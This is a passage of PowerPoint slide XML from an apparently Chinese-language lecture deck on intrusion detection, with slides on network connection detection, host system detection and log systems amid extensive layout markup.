            <p:spPr>
              <a:xfrm>
                <a:off x="469" y="8325"/>
                <a:ext cx="2278" cy="594"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="12700">
                <a:noFill/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" anchor="t">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>客户端</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="126" name="Object 119"/>
              <p:cNvGraphicFramePr>
                <a:graphicFrameLocks noChangeAspect="1"/>
              </p:cNvGraphicFramePr>
              <p:nvPr/>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="5520" y="7200"/>
              <a:ext cx="605" cy="465"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
                <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                  <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                    <p:oleObj spid="_x0000_s7368" r:id="rId25" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj r:id="rId25" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="126" name="Object 119"/>
                          <p:cNvPicPr/>
                          <p:nvPr/>
                        </p:nvPicPr>
                        <p:blipFill>
                          <a:blip r:embed="rId9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </p:blipFill>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="5520" y="7200"/>
                            <a:ext cx="605" cy="465"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="38100">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </p:spPr>
                      </p:pic>
                    </p:oleObj>
                  </mc:Fallback>
                </mc:AlternateContent>
              </a:graphicData>
            </a:graphic>
          </p:graphicFrame>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="127" name="Object 120"/>
              <p:cNvGraphicFramePr>
                <a:graphicFrameLocks noChangeAspect="1"/>
              </p:cNvGraphicFramePr>
              <p:nvPr/>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="6000" y="7200"/>
              <a:ext cx="605" cy="465"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
                <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                  <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                    <p:oleObj spid="_x0000_s7369" r:id="rId26" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj r:id="rId26" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="127" name="Object 120"/>
                          <p:cNvPicPr/>
                          <p:nvPr/>
                        </p:nvPicPr>
                        <p:blipFill>
                          <a:blip r:embed="rId9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </p:blipFill>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="6000" y="7200"/>
                            <a:ext cx="605" cy="465"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="38100">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </p:spPr>
                      </p:pic>
                    </p:oleObj>
                  </mc:Fallback>
                </mc:AlternateContent>
              </a:graphicData>
            </a:graphic>
          </p:graphicFrame>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="142" name="Object 121"/>
              <p:cNvGraphicFramePr>
                <a:graphicFrameLocks noChangeAspect="1"/>
              </p:cNvGraphicFramePr>
              <p:nvPr/>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="6480" y="7200"/>
              <a:ext cx="605" cy="465"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
                <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                  <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                    <p:oleObj spid="_x0000_s7370" r:id="rId27" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj r:id="rId27" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="142" name="Object 121"/>
                          <p:cNvPicPr/>
                          <p:nvPr/>
                        </p:nvPicPr>
                        <p:blipFill>
                          <a:blip r:embed="rId9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </p:blipFill>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="6480" y="7200"/>
                            <a:ext cx="605" cy="465"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="38100">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </p:spPr>
                      </p:pic>
                    </p:oleObj>
                  </mc:Fallback>
                </mc:AlternateContent>
              </a:graphicData>
            </a:graphic>
          </p:graphicFrame>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="144" name="Object 122"/>
              <p:cNvGraphicFramePr>
                <a:graphicFrameLocks noChangeAspect="1"/>
              </p:cNvGraphicFramePr>
              <p:nvPr/>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="6840" y="7200"/>
              <a:ext cx="605" cy="465"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
                <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                  <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                    <p:oleObj spid="_x0000_s7371" r:id="rId28" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj r:id="rId28" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="144" name="Object 122"/>
                          <p:cNvPicPr/>
                          <p:nvPr/>
                        </p:nvPicPr>
                        <p:blipFill>
                          <a:blip r:embed="rId9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </p:blipFill>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="6840" y="7200"/>
                            <a:ext cx="605" cy="465"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="38100">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </p:spPr>
                      </p:pic>
                    </p:oleObj>
                  </mc:Fallback>
                </mc:AlternateContent>
              </a:graphicData>
            </a:graphic>
          </p:graphicFrame>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="145" name="Object 123"/>
              <p:cNvGraphicFramePr>
                <a:graphicFrameLocks noChangeAspect="1"/>
              </p:cNvGraphicFramePr>
              <p:nvPr/>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="7320" y="7200"/>
              <a:ext cx="605" cy="465"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
                <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                  <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                    <p:oleObj spid="_x0000_s7372" r:id="rId29" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj r:id="rId29" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="145" name="Object 123"/>
                          <p:cNvPicPr/>
                          <p:nvPr/>
                        </p:nvPicPr>
                        <p:blipFill>
                          <a:blip r:embed="rId9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </p:blipFill>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="7320" y="7200"/>
                            <a:ext cx="605" cy="465"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="38100">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </p:spPr>
                      </p:pic>
                    </p:oleObj>
                  </mc:Fallback>
                </mc:AlternateContent>
              </a:graphicData>
            </a:graphic>
          </p:graphicFrame>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="146" name="Object 124"/>
              <p:cNvGraphicFramePr>
                <a:graphicFrameLocks noChangeAspect="1"/>
              </p:cNvGraphicFramePr>
              <p:nvPr/>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="7800" y="7200"/>
              <a:ext cx="605" cy="465"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
                <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                  <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                    <p:oleObj spid="_x0000_s7373" r:id="rId30" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj r:id="rId30" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="146" name="Object 124"/>
                          <p:cNvPicPr/>
                          <p:nvPr/>
                        </p:nvPicPr>
                        <p:blipFill>
                          <a:blip r:embed="rId9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </p:blipFill>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="7800" y="7200"/>
                            <a:ext cx="605" cy="465"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="38100">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </p:spPr>
                      </p:pic>
                    </p:oleObj>
                  </mc:Fallback>
                </mc:AlternateContent>
              </a:graphicData>
            </a:graphic>
          </p:graphicFrame>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="147" name="Object 125"/>
              <p:cNvGraphicFramePr>
                <a:graphicFrameLocks noChangeAspect="1"/>
              </p:cNvGraphicFramePr>
              <p:nvPr/>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="8280" y="7200"/>
              <a:ext cx="605" cy="465"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
                <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                  <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                    <p:oleObj spid="_x0000_s7374" r:id="rId31" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj r:id="rId31" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="147" name="Object 125"/>
                          <p:cNvPicPr/>
                          <p:nvPr/>
                        </p:nvPicPr>
                        <p:blipFill>
                          <a:blip r:embed="rId9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </p:blipFill>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="8280" y="7200"/>
                            <a:ext cx="605" cy="465"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="38100">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </p:spPr>
                      </p:pic>
                    </p:oleObj>
                  </mc:Fallback>
                </mc:AlternateContent>
              </a:graphicData>
            </a:graphic>
          </p:graphicFrame>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="148" name="Object 126"/>
              <p:cNvGraphicFramePr>
                <a:graphicFrameLocks noChangeAspect="1"/>
              </p:cNvGraphicFramePr>
              <p:nvPr/>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="8760" y="7200"/>
              <a:ext cx="605" cy="465"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
                <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                  <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                    <p:oleObj spid="_x0000_s7375" r:id="rId32" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj r:id="rId32" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="148" name="Object 126"/>
                          <p:cNvPicPr/>
                          <p:nvPr/>
                        </p:nvPicPr>
                        <p:blipFill>
                          <a:blip r:embed="rId9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </p:blipFill>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="8760" y="7200"/>
                            <a:ext cx="605" cy="465"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="38100">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </p:spPr>
                      </p:pic>
                    </p:oleObj>
                  </mc:Fallback>
                </mc:AlternateContent>
              </a:graphicData>
            </a:graphic>
          </p:graphicFrame>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="150" name="Object 127"/>
              <p:cNvGraphicFramePr>
                <a:graphicFrameLocks noChangeAspect="1"/>
              </p:cNvGraphicFramePr>
              <p:nvPr/>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="9240" y="7200"/>
              <a:ext cx="605" cy="465"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
                <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                  <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                    <p:oleObj spid="_x0000_s7376" r:id="rId33" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj r:id="rId33" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="150" name="Object 127"/>
                          <p:cNvPicPr/>
                          <p:nvPr/>
                        </p:nvPicPr>
                        <p:blipFill>
                          <a:blip r:embed="rId9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </p:blipFill>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="9240" y="7200"/>
                            <a:ext cx="605" cy="465"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="38100">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </p:spPr>
                      </p:pic>
                    </p:oleObj>
                  </mc:Fallback>
                </mc:AlternateContent>
              </a:graphicData>
            </a:graphic>
          </p:graphicFrame>
        </p:grpSp>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="129029" name="Object 105"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="10482" y="6893"/>
            <a:ext cx="1596" cy="1267"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s7377" r:id="rId34" imgW="3277870" imgH="2598420" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj r:id="rId34" imgW="3277870" imgH="2598420" progId="">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="129029" name="Object 105"/>
                        <p:cNvPicPr/>
                        <p:nvPr/>
                      </p:nvPicPr>
                      <p:blipFill>
                        <a:blip r:embed="rId6"/>
                        <a:stretch>
                          <a:fillRect/>
                        </a:stretch>
                      </p:blipFill>
                      <p:spPr>
                        <a:xfrm>
                          <a:off x="10482" y="6893"/>
                          <a:ext cx="1596" cy="1267"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="38100">
                          <a:noFill/>
                          <a:miter/>
                        </a:ln>
                      </p:spPr>
                    </p:pic>
                  </p:oleObj>
                </mc:Fallback>
              </mc:AlternateContent>
            </a:graphicData>
          </a:graphic>
        </p:graphicFrame>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BED6931-6867-4405-BA47-12127A0DB453}"/>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2299970"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sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>网络连接检测</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="组合 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1352031" y="2378533"/>
            <a:ext cx="6915785" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="10891" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1965"/>
              <a:ext cx="965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对试图进入该主机的数据流进行检测</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="27" name="组合 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>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1"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32" name="组合 31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1352031" y="3670758"/>
            <a:ext cx="8982075" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="14145" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1965"/>
              <a:ext cx="12913"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避免或减少这些数据流进入主机系统后造成损害</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="34" name="组合 33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>
              <a:chExt cx="1508" cy="1508"/>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43"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51" name="组合 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1352031" y="3036393"/>
            <a:ext cx="6915785" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="10891" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1965"/>
              <a:ext cx="965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分析确定是否有入侵行为</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="54" name="组合 53"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>
              <a:chExt cx="1508" cy="1508"/>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60" name="图片 59"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7691120" y="4628515"/>
            <a:ext cx="3650615" cy="1407795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:softEdge rad="127000"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3FE86F4-2391-4C61-964B-D147DB18C31E}"/>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2299970"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sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>主机系统检测</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="组合 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1352031" y="2378533"/>
            <a:ext cx="8036560" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="12656" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1965"/>
              <a:ext cx="11424"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检测入侵行为在主机相关文件中留下的痕迹</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="27" name="组合 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>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1"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1" name="组合 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1352031" y="3036393"/>
            <a:ext cx="8282940" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="13044" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1965"/>
              <a:ext cx="11812"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帮助系统管理员发现入侵行为或入侵企图</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="54" name="组合 53"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>
              <a:chExt cx="1508" cy="1508"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8000365" y="3750310"/>
            <a:ext cx="3267075" cy="2323465"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:softEdge rad="127000"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD4839A0-48F9-4CD7-9C8F-8618C60D984B}"/>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3035935"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sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>主机系统检测对象</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="组合 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1352031" y="2378533"/>
            <a:ext cx="2487295" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="3917" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1965"/>
              <a:ext cx="2685"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日志系统</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="27" name="组合 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>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31"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1" name="组合 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1352031" y="3036393"/>
            <a:ext cx="2757805" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="4343" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
